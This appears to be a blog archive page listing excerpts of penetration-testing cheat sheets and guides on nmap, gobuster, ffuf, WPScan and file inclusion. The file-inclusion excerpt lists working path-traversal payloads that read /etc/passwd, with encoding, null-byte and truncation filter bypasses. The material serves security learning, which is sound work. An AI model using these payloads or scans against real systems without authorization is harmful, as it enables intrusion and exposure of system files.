Posted inWebPentest
Posted inPenTest
PenTest 101 – Cheat Sheet
CommandDescriptionsudo nano /etc/hostsOpens the /etc/hosts with nano to start adding hostnamessudo nmap -p 80,443,8000,8080,8180,8888,10000 --open -oA web_discovery -iL scope_listRuns an nmap scan using common web application ports based on a scope list (scope_list) and outputs to a file (web_discovery)…
Posted inEnumeration WebPentest
Gobuster Cheat Sheet
Common Gobuster Commands dir Mode gobuster dir -u https://nlabs.local -w ~/wordlists/shortlist.txt With content length gobuster dir -u https://nlabs.local -w ~/wordlists/shortlist.txt -l dns Mode gobuster dns -d nlabs.local -t 50 -w common-names.txt gobuster dns -d nlabs.local -w…
Posted inWebPentest Web Enumeration
Complete Guide on ffuf
In web application penetration testing, entry points are areas of an application where a user can input data or interact with the system, which an attacker could potentially exploit. Identifying these points is crucial because they…
Posted inEnumeration WebPentest
Fuff – Cheat Sheet
Ffuf commands CommandDescriptionffuf -hffuf helpffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZDirectory Fuzzingffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZExtension Fuzzingffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.phpPage Fuzzingffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -vRecursive Fuzzingffuf -w wordlist.txt:FUZZ -u https://FUZZ.nlabs.local/Sub-domain Fuzzingffuf…
Posted inWebPentest
File Inclusion – Cheat Sheet
Local File Inclusion CommandDescription Basic LFI /index.php?language=/etc/passwdBasic LFI /index.php?language=../../../../etc/passwdLFI with path traversal /index.php?language=/../../../etc/passwdLFI with name prefix /index.php?language=./languages/../../../../etc/passwdLFI with approved path LFI Bypasses /index.php?language=....//....//....//....//etc/passwdBypass basic path traversal filter /index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64Bypass filters with URL encoding /index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]Bypass appended extension with path truncation (obsolete) /index.php?language=../../../../etc/passwd%00Bypass appended extension with…
Posted inWebPentest
Web Vulnerabilities – File Inclusion
Path Traversal Also known as Directory traversal, a web security vulnerability allows an attacker to read operating system resources, such as local files on the server running an application. The attacker exploits this vulnerability by manipulating and…
Posted inEnumeration WebPentest
Enumerating WordPress with WPScan
WPScan capabilities The version of WordPress installed and any associated vulnerabilities What plugins are installed and any associated vulnerabilities What themes are installed and any associated vulnerabilities Username enumeration Users with weak passwords via password brute…
Posted inEnumeration
Nmap
Nmap scan - port states Port StateDescriptionOpenIndicates that an application on the target system is actively accepting connections (TCP/UDP/SCTP) on that port.ClosedIndicates there isn’t any application listening on that port.FilteredNmap cannot to determine the port status…